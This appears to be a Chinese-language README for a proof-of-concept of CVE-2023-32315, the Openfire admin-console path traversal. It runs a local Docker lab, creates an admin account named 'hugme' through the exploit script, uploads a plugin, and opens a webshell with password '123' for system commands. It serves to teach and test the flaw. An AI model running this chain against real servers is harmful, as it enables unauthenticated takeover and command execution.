⚠️ 仅供教育和授权安全研究使用
非常感谢原始 PoC 作者 phith0n 和 K3ysTr0K3R
Openfire 是一款基于开源 Apache 许可证的 XMPP 服务器。Openfire 的管理控制台(一个基于 Web 的应用程序)被发现容易受到通过安装环境的路径遍历攻击。这允许未经身份验证的用户在已配置的 Openfire 环境中使用未经身份验证的 Openfire 安装环境,访问管理员专用的 Openfire 管理控制台中的受限页面。此漏洞影响自 2015 年 4 月以来发布的所有 Openfire 版本,从 3.10.0 版本开始。该问题已在 Openfire 4.7.5 和 4.6.8 版本中得到修复,并且将在尚未发布的 4.8 分支的第一个版本(预计为 4.8.0)中包含进一步的改进。建议用户升级。如果某个特定版本没有可用的 Openfire 升级,或者无法立即实施,用户可以查看链接的 GitHub 安全公告(GHSA-gw42-f939-fhvm)以获取缓解建议。
首先,克隆仓库
git clone https://github.com/asepsaepdin/CVE-2023-32315.git
切换目录
cd CVE-2023-32315
启动容器
docker compose up
运行 Python 脚本 CVE-2023-32315.py 来利用目标主机 http://127.0.0.1:9090
python3 CVE-2023-32315.py -u http://localhost:9090
然后使用该账户登录管理控制台,您会看到 hugme 已经是管理员了。
转到插件标签 > 上传插件 openfire-management-tool-plugin.jar
转到服务器标签 > 服务器设置 > 管理工具
使用密码 "123" 访问 webshell
前往“系统命令”并将其用作命令行,每次只使用一个命令